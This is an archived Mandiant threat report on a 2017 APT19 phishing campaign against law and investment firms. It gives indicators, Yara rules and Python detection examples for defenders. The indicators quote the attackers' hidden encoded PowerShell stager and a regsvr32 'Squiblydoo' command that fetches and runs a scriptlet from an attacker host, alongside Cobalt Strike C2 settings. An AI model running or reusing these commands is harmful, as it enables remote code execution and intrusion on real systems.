Privileges and Credentials: Phished at the Request of Counsel | Mandiant
By Mandiant
Published: 2017-06-06 · Archived: 2026-04-05 12:50:31 UTC
Summary
In May and June 2017, FireEye observed a phishing campaign targeting at least seven global law and investment
firms. We have associated this campaign with APT19, a group that we assess is composed of freelancers, with
some degree of sponsorship by the Chinese government.
APT19 used three different techniques to attempt to compromise targets. In early May, the phishing lures
leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199.
Toward the end of May, APT19 switched to using macro-enabled Microsoft Excel (XLSM) documents. In the
most recent versions, APT19 added an application whitelisting bypass to the XLSM documents. At least one
observed phishing lure delivered a Cobalt Strike payload.
As of the writing of this blog post, FireEye had not observed post-exploitation activity by the threat actors, so we
cannot assess the goal of the campaign. We have previously observed APT19 steal data from law and investment
firms for competitive economic purposes.
The purpose of this blog post is to inform law firms and investment firms of this phishing campaign and provide
technical indicators that their IT personnel can use for proactive hunting and detection.
The Emails
APT19 phishing emails from this campaign were sent from accounts on the "@cloudsend[.]net" domain and used a
variety of subjects and attachment names. Refer to the Indicators of Compromise section for more details.
The Attachments
APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel (XLSM) files to deliver their
initial exploits. The following sections describe the two methods in further detail.
RTF Attachments
Through the exploitation of the HTA handler vulnerability described in CVE-2017-0199, the observed RTF
attachments download hxxp://tk-in-f156.2bunny[.]com/Agreement.doc. By the time of analysis this file was no longer
hosted at tk-in-f156.2bunny[.]com, so it could not be retrieved for further analysis. Figure 1 is a screenshot of a
packet capture showing one of the RTF files reaching out to hxxp://tk-in-f156.2bunny[.]com/Agreement.doc.
https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel
Page 1 of 14
XLSM Attachments
The XLSM attachments contained multiple worksheets with content that reflected the attachment name. The
attachments also contained an image that requested the user to “Enable Content”, which would enable macro
support if it was disabled. Figure 2 provides a screenshot of one of the XLSM files
(MD5: 30f149479c02b741e897cdb9ecd22da7).
One of the malicious XLSM attachments that we observed contained a macro that:
1. Determined the system architecture to select the correct path for PowerShell
2. Launched a ZLIB-compressed, Base64-encoded command with PowerShell. This is a typical technique
used by Meterpreter stagers.
Figure 3 depicts the macro embedded within the XLSM file (MD5: 38125a991efc6ab02f7134db0ebe21b6).
Figure 4 contains the decoded output of the encoded text.
Figure 4: Decoded ZLIB + Base64 payload
The shellcode invokes PowerShell to issue an HTTP GET request for a random four (4) character URI on the root
of autodiscovery[.]2bunny[.]com. The requests contain minimal HTTP headers because the PowerShell command is
executed with mostly default parameters. Figure 5 depicts an HTTP GET request generated by the payload, with
minimal HTTP headers.
Figure 5: GET Request with minimal HTTP headers
Converting the shellcode to ASCII and removing the non-printable characters provides a quick way to pull out
network-based indicators (NBI) from the shellcode. Figure 6 shows the extracted NBIs.
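As an added example (not code from the Mandiant post), the following Python reproduces the two analyst steps described above: decoding the Base64 + DEFLATE command the macro hands to PowerShell, then pulling printable strings and network indicators out of the result. The command line and script it decodes are constructed stand-ins, and autodiscover.example.invalid is a placeholder host.

```python
import base64
import re
import zlib
from typing import List, Optional

# IO.Compression.DeflateStream is raw DEFLATE (no zlib header), so both the
# constructed sample and the decoder use wbits=-15.
_B64_ARG = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)')
_NBI = re.compile(r"https?://[\w./-]+|\b(?:\d{1,3}\.){3}\d{1,3}\b|\b(?:[\w-]+\.)+[a-z]{2,}\b")

def extract_base64(command_line: str) -> Optional[str]:
    """Return the blob passed to [Convert]::FromBase64String("..."), if present."""
    m = _B64_ARG.search(command_line)
    return m.group(1) if m else None

def inflate_stager(b64: str) -> bytes:
    """Base64-decode then raw-inflate, mirroring DeflateStream + StreamReader.ReadToEnd()."""
    return zlib.decompress(base64.b64decode(b64), wbits=-15)

def printable_strings(data: bytes, min_len: int = 6) -> List[str]:
    """Runs of printable ASCII at least min_len long: the 'strings' step from the text."""
    return [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]

def network_indicators(strings: List[str]) -> List[str]:
    """URLs, IPv4 addresses and lowercase host names found in the extracted strings."""
    return sorted({hit for s in strings for hit in _NBI.findall(s)})

# Constructed sample: a harmless stand-in for a decoded stager (placeholder host).
SAMPLE_SCRIPT = (
    "$c = New-Object Net.WebClient\n"
    "$c.Headers.Add('User-Agent', 'Mozilla/5.0 (compatible; MSIE 9.0)')\n"
    "$d = $c.DownloadData('http://autodiscover.example.invalid/K5om')\n"
)
_co = zlib.compressobj(wbits=-15)  # raw DEFLATE, as DeflateStream would consume
SAMPLE_B64 = base64.b64encode(_co.compress(SAMPLE_SCRIPT.encode()) + _co.flush()).decode()
SAMPLE_CMDLINE = (
    'powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader('
    '$(New-Object IO.Compression.DeflateStream($(New-Object IO.MemoryStream(,$([Convert]::'
    f'FromBase64String("{SAMPLE_B64}")))), [IO.Compression.CompressionMode]::Decompress)), '
    '[Text.Encoding]::ASCII)).ReadToEnd();"'
)

if __name__ == "__main__":
    decoded = inflate_stager(extract_base64(SAMPLE_CMDLINE))
    print(decoded.decode())
    print(network_indicators(printable_strings(decoded)))
```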
Figure 6: Decoded shellcode
FireEye also identified an alternate macro in some of the XLSM documents, displayed in Figure 7.
Figure 7: Alternate macro
This macro uses Casey Smith’s “Squiblydoo” Application Whitelisting bypass technique to run the command in
Figure 8.
Figure 8: Application Whitelisting Bypass
The command in Figure 8 downloads and launches code within an SCT file. The SCT file in the payload (MD5:
1554d6fe12830ae57284b389a1132d65) contained the code shown in Figure 9.
Figure 10 provides the decoded script. Notice the “$DoIt” string, which is usually indicative of a Cobalt Strike
payload.
Figure 10: Decoded SCT contents
A quick conversion of the contents of the variable “$var_code” from Base64 to ASCII shows some familiar
network indicators, shown in Figure 11.
Figure 11: $var_code to ASCII
Second Stage Payload
Once the XLSM launches its PowerShell command, it downloads a typical Cobalt Strike BEACON payload,
configured with the following parameters:
Process Inject Targets:
    %windir%\syswow64\rundll32.exe
    %windir%\sysnative\rundll32.exe
c2_user_agents:
    Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB)
Named Pipes:
    \\%s\pipe\msagent_%x
beacon_interval:
    60
C2:
    autodiscover.2bunny[.]com/submit.php
    autodiscover.2bunny[.]com/IE9CompatViewList.xml
    sfo02s01-in-f2.cloudsend[.]net/submit.php
    sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml
C2 Port:
    TCP/80
Figure 12 depicts an example of a BEACON C2 attempt from this payload.
Figure 12: Cobalt Strike BEACON C2
FireEye Product Detections
The following FireEye products currently detect and block the methods described above. Table 1 lists the current
detection and blocking capabilities by product.
Detection Name                                   Product    Action   Notes
SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)        HX         Detect   XLSM Macro launch
Gen:Variant.Application.HackTool.CobaltStrike.1  HX         Detect   XLSM Macro launch
Malware Object                                   HX         Detect   BEACON written to disk
Backdoor.BEACON                                  NX         Block*   BEACON Callback
FE_Malformed_RTF                                 EX/ETP/NX  Block*   RTF
Malware.Binary.rtf                               EX/ETP/NX  Block*   RTF
Malware.Binary                                   EX/ETP/NX  Block*   RTF
Malware.Binary.xlsx                              EX/ETP/NX  Block*   XLSM
Table 1: Detection review
*Appliances must be configured for block mode.
Recommendations
FireEye recommends organizations perform the following steps to mitigate the risk of this campaign:
1. Microsoft Office users should apply the Microsoft patch for CVE-2017-0199 as soon as possible, if they have
not already installed it.
2. Search historic and future emails that match the included indicators of compromise.
3. Review web proxy logs for connections to the included network-based indicators of compromise.
4. Block connections to the included fully qualified domain names.
5. Review endpoints for the included host-based indicators of compromise.
Indicators of Compromise
The following section provides the IOCs for the variants of the phishing emails and malicious payloads that
FireEye has observed during this campaign.
Email Senders
PressReader
Angela Suh
Ashley Safronoff
Lindsey Hersh
Sarah Roberto
sarah.roberto@cloudsend[.]net
noreply@cloudsend[.]net
Email Subject Lines
Macron Denies Authenticity Of Leak, French Prosecutors Open Probe
Macron Document Leaker Releases New Images, Promises More Information
Are Emmanuel Macron's Tax Evasion Documents Real?
Time Allocation
Vacancy Report
china paper table and graph
results with zeros – some ready not all finished
Macron Leaks contain secret plans for the islamisation of France and Europe
Attachment Names
Macron_Authenticity.doc.rtf
Macron_Information.doc.rtf
US and EU Trade with China and China CA.xlsm
Tables 4 5 7 Appendix with zeros.xlsm
Project Codes - 05.30.17.xlsm
Weekly Vacancy Status Report 5-30-15.xlsm
Macron_Tax_Evasion.doc.rtf
Macron_secret_plans.doc.rtf
Network Based Indicators (NBI)
Host Based Indicators (HBI)
RTF MD5 hash values
0bef39d0e10b1edfe77617f494d733a8
0e6da59f10e1c4685bb5b35a30fc8fb6
cebd0e9e05749665d893e78c452607e2
XLSX MD5 hash values
38125a991efc6ab02f7134db0ebe21b6
3a1dca21bfe72368f2dd46eb4d9b48c4
30f149479c02b741e897cdb9ecd22da7
BEACON and Meterpreter payload MD5 hash values
bae0b39197a1ac9e24bdf9a9483b18ea
1151619d06a461456b310096db6bc548
Process arguments, named pipes, and file paths
powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("")
regsvr32.exe /s /n /u /i:hxxps://lyncdiscover.2bunny.com/Autodiscover scrobj.dll
\\\pipe\msagent_<4 digits>
C:\Documents and Settings\\Local Settings\Temp\K5om.dll (4 character DLL based on URI of original GET request)
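The process arguments and pipe name listed above can be turned into endpoint detection logic. This added Python example (not Mandiant's code) flags the hidden, encoded PowerShell stager, the regsvr32 "Squiblydoo" launch from Figure 8, and the msagent_ named pipe from the BEACON configuration, and runs them over constructed sample telemetry; the event dictionary shape and the c2.example.invalid host are assumptions.

```python
import re

# Hidden, non-interactive PowerShell carrying an inline Base64 + DEFLATE blob.
_PS_FLAGS = re.compile(r"\s-(?:NoP|NonI|W\s+Hidden)\b", re.I)
_PS_BLOB = re.compile(r"FromBase64String|IO\.Compression\.DeflateStream", re.I)
# regsvr32 fetching a scriptlet over HTTP(S) and loading it through scrobj.dll.
_SQUIBLYDOO = re.compile(r"regsvr32(?:\.exe)?\b.*\s[/-]i:https?://\S+.*\bscrobj\.dll", re.I)
# The BEACON config's pipe template \\%s\pipe\msagent_%x, with %x rendered as hex.
_BEACON_PIPE = re.compile(r"\\pipe\\msagent_[0-9a-f]{1,8}$", re.I)

def is_powershell_stager(cmdline):
    """powershell.exe with at least two stealth flags and an encoded/compressed payload."""
    if not re.search(r"\bpowershell(?:\.exe)?\b", cmdline, re.I):
        return False
    return len(_PS_FLAGS.findall(cmdline)) >= 2 and bool(_PS_BLOB.search(cmdline))

def is_squiblydoo(cmdline):
    return bool(_SQUIBLYDOO.search(cmdline))

def is_beacon_pipe(pipe_name):
    return bool(_BEACON_PIPE.search(pipe_name))

def triage(events):
    """Return (event index, rule name) for each event that trips a rule."""
    hits = []
    for i, ev in enumerate(events):
        if ev["type"] == "process":
            if is_powershell_stager(ev["cmdline"]):
                hits.append((i, "encoded_powershell_stager"))
            if is_squiblydoo(ev["cmdline"]):
                hits.append((i, "regsvr32_squiblydoo"))
        elif ev["type"] == "pipe" and is_beacon_pipe(ev["name"]):
            hits.append((i, "beacon_named_pipe"))
    return hits

# Constructed sample telemetry; host, blob and pipe suffix are placeholders, not IOCs.
SAMPLE_EVENTS = [
    {"type": "process", "cmdline": 'powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression '
     '$(New-Object IO.StreamReader($(New-Object IO.Compression.DeflateStream($(New-Object '
     'IO.MemoryStream(,$([Convert]::FromBase64String(\\"AAAA\\"))))))).ReadToEnd();"'},
    {"type": "process", "cmdline": "regsvr32.exe /s /n /u /i:https://c2.example.invalid/Autodiscover scrobj.dll"},
    {"type": "process", "cmdline": "regsvr32.exe /s C:\\Windows\\System32\\msxml3.dll"},  # benign re-register
    {"type": "process", "cmdline": "powershell.exe -NoP -Command Get-Date"},              # benign, one flag only
    {"type": "pipe", "name": "\\\\.\\pipe\\msagent_1a2b"},
    {"type": "pipe", "name": "\\\\.\\pipe\\lsass"},
]

if __name__ == "__main__":
    for idx, rule in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```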
Yara Rules
rule FE_LEGALSTRIKE_MACRO {
    meta:
        version=".1"
        filetype="MACRO"
        author="Ian.Ahl@fireeye.com @TekDefense"
        date="2017-06-02"
        description="This rule is designed to identify macros with the specific encoding used in the sample 30f14
    strings:
        // OBFUSCATION
        $ob1 = "ChrW(114) & ChrW(101) & ChrW(103) & ChrW(115) & ChrW(118) & ChrW(114) & ChrW(51) & ChrW(50) & Chr
        $ob2 = "ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47) & ChrW(115) & ChrW(32) & ChrW(47) & ChrW(110) & ChrW(
        $ob3 = "ChrW(117) & ChrW(32) & ChrW(47) & ChrW(105) & ChrW(58) & ChrW(104) & ChrW(116) & ChrW(116) & ChrW
        $ob4 = "ChrW(58) & ChrW(47) & ChrW(47) & ChrW(108) & ChrW(121) & ChrW(110) & ChrW(99) & ChrW(100) & ChrW(
        $ob5 = "ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(46) & ChrW(50) & ChrW(98) & ChrW(
        $ob6 = "ChrW(110) & ChrW(121) & ChrW(46) & ChrW(99) & ChrW(111) & ChrW(109) & ChrW(47) & ChrW(65) & ChrW(
        $ob7 = "ChrW(111) & ChrW(100) & ChrW(105) & ChrW(115) & ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & Ch
        $ob8 = "ChrW(115) & ChrW(99) & ChrW(114) & ChrW(111) & ChrW(98) & ChrW(106) & ChrW(46) & ChrW(100) & ChrW
        $obreg1 = /(\w{5}\s&\s){7}\w{5}/
        $obreg2 = /(Chrw\(\d{1,3}\)\s&\s){7}/
        // wscript
        $wsobj1 = "Set Obj = CreateObject(\"WScript.Shell\")" ascii wide
        $wsobj2 = "Obj.Run " ascii wide
    condition:
        uint16(0) != 0x5A4D
        and
        (
            (all of ($wsobj*) and 3 of ($ob*))
            or
            (all of ($wsobj*) and all of ($obreg*))
        )
}
rule FE_LEGALSTRIKE_MACRO_2 {
    meta:
        version=".1"
        filetype="MACRO"
        author="Ian.Ahl@fireeye.com @TekDefense"
        date="2017-06-02"
        description="This rule was written to hit on specific variables and powershell command fragments as seen
    strings:
        // Setting the environment
        $env1 = "Arch = Environ(\"PROCESSOR_ARCHITECTURE\")" ascii wide
        $env2 = "windir = Environ(\"windir\")" ascii wide
        $env3 = "windir + \"\\syswow64\\windowspowershell\\v1.0\\powershell.exe\"" ascii wide
        // powershell command fragments
        $ps1 = "-NoP" ascii wide
        $ps2 = "-NonI" ascii wide
        $ps3 = "-W Hidden" ascii wide
        $ps4 = "-Command" ascii wide
        $ps5 = "New-Object IO.StreamReader" ascii wide
        $ps6 = "IO.Compression.DeflateStream" ascii wide
        $ps7 = "IO.MemoryStream" ascii wide
        $ps8 = ",$([Convert]::FromBase64String" ascii wide
        $ps9 = "ReadToEnd();" ascii wide
        $psregex1 = /\W\w+\s+\s\".+\"/
    condition:
        uint16(0) != 0x5A4D
        and
        (
            (all of ($env*) and 6 of ($ps*))
            or
            (all of ($env*) and 4 of ($ps*) and all of ($psregex*))
        )
}
rule FE_LEGALSTRIKE_RTF {
    meta:
        version=".1"
        filetype="MACRO"
        author="joshua.kim@FireEye.com"
        date="2017-06-02"
        description="Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain 2bunnyDO
    strings:
        $header = "{\\rt"
        $lnkinfo = "4c0069006e006b0049006e0066006f"
        $encoded1 = "4f4c45324c696e6b"
        $encoded2 = "52006f006f007400200045006e007400720079"
        $encoded3 = "4f0062006a0049006e0066006f"
        $encoded4 = "4f006c0065"
        $http1 = "68{"
        $http2 = "74{"
        $http3 = "07{"
        // 2bunny.com
        $domain1 = "32{\\"
        $domain2 = "62{\\"
        $domain3 = "75{\\"
        $domain4 = "6e{\\"
        $domain5 = "79{\\"
        $domain6 = "2e{\\"
        $domain7 = "63{\\"
        $domain8 = "6f{\\"
        $domain9 = "6d{\\"
        $datastore = "\\*\\datastore"
    condition:
        $header at 0 and all of them
}
Acknowledgements
Joshua Kim, Nick Carr, Gerry Stellatos, Charles Carmakal, TJ Dahms, Nick Richard, Barry Vengerik, Justin
Prosco, Christopher Glyer
Source: https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel